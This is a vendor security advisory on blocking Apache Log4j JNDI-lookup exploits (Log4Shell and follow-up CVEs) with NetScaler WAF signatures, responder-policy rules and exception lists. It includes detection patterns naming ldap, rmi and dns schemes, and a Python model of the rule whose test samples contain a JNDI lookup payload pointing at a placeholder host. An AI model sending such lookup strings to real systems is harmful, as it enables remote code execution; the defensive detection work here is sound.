
    • Validation Status: Validated
      Has Video?: No

    Guidance for reducing Apache Log4j security vulnerability risk with WAF (CVE-2021-44228/CVE-2021-45046/CVE-2021-45105)

    Submitted December 13, 2021

    Author: Sunit Chauhan


    A zero-day exploit affecting Apache Log4j versions 2.0-beta9 through 2.14.1 was made public on December 9, 2021. In these versions, the JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. As a result, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

    NetScaler recommends that customers follow Apache’s recommendations. In addition, Web App Firewall (WAF) customers should consider the following recommendations to improve the security of their applications from this vulnerability.

    The NetScaler research team has released updated WAF signatures designed to mitigate in part the CVE-2021-44228 vulnerability. If you are using any of these Log4j versions (from 2.0-beta9 to 2.14.1), NetScaler strongly recommends that you download signatures version 73 and apply it to your WAF deployments as an additional layer of protection for your applications. The signatures are compatible with NetScaler Application Delivery Controller (ADC) software versions 11.1, 12.0, 12.1, 13.0 and 13.1. Please note that version 12.0 is End of Life. Learn more about the release life cycle at https://www.citrix.com/support/product-lifecycle/product-matrix.html.

    If you are already using WAF with signatures with the auto-update feature enabled, you may follow these steps after verifying that the signature version is at least version 73.

    1. Search your signatures for CVE-2021-44228 LogString.
    2. Select the results.
    3. Choose “Enable Rules” and click OK.

    NetScaler ADC Standard and Advanced edition customers, as well as Premium edition customers who do not have WAF signatures enabled, can use responder policies for protection as shown below. Please bind the responder policy to the appropriate bind point (vserver or global).

    add policy patset patset_cve_2021_44228
    bind policy patset patset_cve_2021_44228 ldap
    bind policy patset patset_cve_2021_44228 http
    bind policy patset patset_cve_2021_44228 https
    bind policy patset patset_cve_2021_44228 ldaps
    bind policy patset patset_cve_2021_44228 rmi
    bind policy patset patset_cve_2021_44228 dns
    add responder policy mitigate_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP

    NetScaler recommends WAF customers use the latest signature version, enable signatures auto-update, and subscribe to receive signature alert notifications. NetScaler will continue to monitor this dynamic situation and update as new mitigations become available.

    Update 1 (December 15, 2021)

    If any of your application availability is inadvertently impacted due to false positives resulting from the above-mentioned mitigation policies, NetScaler recommends the following modifications to the policy. Please note that any endpoint covered by the exception_list may expose those assets to the risks from CVE-2021-44228.

    1. Modifications to Responder Policy
    add policy patset exception_list
    # (Example: bind policy patset exception_list "/exception_url")
    set responder policy mitigate_cve_2021_44228 -rule q^HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT && (HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228"))^

    2. Modifications to WAF Policy
    add policy patset exception_list
    # (Example: bind policy patset exception_list "/exception_url")
    Prepend the existing WAF policy rule with HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT
    # (Example: set appfw policy my_WAF_policy -rule q^HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT && <existing rule>^)
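
    The matching logic of the responder rule above, including the Update 1 exception_list check, modelled in Python as an added example (not NetScaler code). The empty-result behaviour of AFTER_STR/BEFORE_STR on no match is an assumption, and all sample requests are constructed.

```python
from urllib.parse import unquote

# Strings bound to patset_cve_2021_44228 by the commands on this page.
PATSET = ("ldap", "http", "https", "ldaps", "rmi", "dns")
STRIP = set("${: }/+")  # argument of STRIP_CHARS in the rule

def after_str(text, needle):
    # Model of AFTER_STR: text after the first match; empty if none (assumed).
    i = text.find(needle)
    return text[i + len(needle):] if i >= 0 else ""

def before_str(text, needle):
    # Model of BEFORE_STR: text before the first match; empty if none (assumed).
    i = text.find(needle)
    return text[:i] if i >= 0 else ""

def nested_lookup(raw):
    # Clause 1: a "${" found inside the first "${ ... }" span after URL-decoding.
    return "${" in before_str(after_str(unquote(raw), "${"), "}")

def jndi_scheme(raw):
    # Clause 2: strip "${: }/+", ignore case, then look for any patset string
    # anywhere after the first "jndi" (not only directly after it).
    stripped = "".join(c for c in unquote(raw).lower() if c not in STRIP)
    tail = after_str(stripped, "jndi")
    return any(p in tail for p in PATSET)

def rule_matches(url, headers, body="", exception_list=()):
    # Update 1 form: a URL containing an exception_list entry skips all checks.
    if any(e in url for e in exception_list):
        return False
    body = body[:8192]  # the rule reads HTTP.REQ.BODY(8192)
    return any(nested_lookup(t) or jndi_scheme(t) for t in (headers, body))

# Constructed sample requests: (url, headers, body)
SAMPLES = [
    ("/", "User-Agent: ${jndi:ldap://example.invalid/a}", ""),
    ("/", "X-Tpl: ${outer:${inner}}", ""),
    ("/docs/search", "Host: example.invalid",
     '{"note": "JNDI guide moved to https://example.invalid/guide"}'),
    ("/", "User-Agent: Mozilla/5.0", ""),
]

if __name__ == "__main__":
    for url, headers, body in SAMPLES:
        print(url, rule_matches(url, headers, body),
              rule_matches(url, headers, body, exception_list=("/docs",)))
```

    The third sample is ordinary text that still matches the second clause, which is the kind of false positive Update 1 addresses; once "/docs" is in the exception list, that endpoint is no longer inspected at all.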

    Update 2 (December 15, 2021)

    A second Log4j vulnerability, CVE-2021-45046, was reported on December 14. It is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0.

    NetScaler recommendations for CVE-2021-44228 with WAF Signatures version 73 and Responder policies will also mitigate the CVE-2021-45046 vulnerability.

    Update 3 (December 19, 2021)

    Another Log4j vulnerability was reported on December 18 (CVE-2021-45105) that affects Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3).

    NetScaler recommendations for CVE-2021-44228/CVE-2021-45046 with WAF Signatures version 73 and Responder policies will also mitigate the CVE-2021-45105 vulnerability exploits.

    Update 4 (December 24, 2021)

    The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

    NetScaler recommendations for CVE-2021-44228/CVE-2021-45046/CVE-2021-45105 with WAF Signatures version 73 and Responder policies have been validated against the above-mentioned CISA Apache Scanner to mitigate vulnerability exploits.

    The current WAF signatures version 74 includes regular updates not related to Log4j vulnerabilities.

    Update 5 (February 9, 2022)

    Another critical Log4j vulnerability, CVE-2022-23305, with a score of 9.8 was reported on January 18th. It affects Log4j versions from 1.2 to 1.2.17.

    NetScaler recommends enabling SQL Injection Protection in the WAF configuration to mitigate CVE-2022-23305 exploits. For customers on software release versions 13.0 and 13.1, NetScaler recommends enabling SQL Grammar-based protection.

    Please note that an ADC firmware upgrade is not required for any of the above-mentioned Log4j mitigations. However, if for any other reason a new ADC build is needed, please use the following latest builds –,, or In case any older build is installed after creating the protection with WAF signatures, please update WAF signatures to the latest version and ensure that the required signatures are enabled.

    NetScaler will continue to update this advisory for CVE-2021-45105 as additional information becomes available.

    Additional Information

    WAF has a single code base across physical, virtual, bare-metal, and containers that brings consistency to your deployment model. This signature update applies to all form factors and deployment models of WAF.

    To learn more about Web App Firewall, see https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/introduction-to-citrix-web-app-firewall.html.

    To learn more about Web App Firewall signatures, check out our alert articles and bot signature articles.

    To learn about the signature alert notification, go to https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/signature-alerts/how-to-receive-signature-alert.html.

    Patches and Mitigations

    NetScaler strongly recommends that customers consider the security guidance from vendors of other products that they may have deployed. Until a patch is made available, you may reduce the risk of a successful attack by applying mitigations. Mitigations should not be considered full solutions as they do not fully address the underlying issue(s).
